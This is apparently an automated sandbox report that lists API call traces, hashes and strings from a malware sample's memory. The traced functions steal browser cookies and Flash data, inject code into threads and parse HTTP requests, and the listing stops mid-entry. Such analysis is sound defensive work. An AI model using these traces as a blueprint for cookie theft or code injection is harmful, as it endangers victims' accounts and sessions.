  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
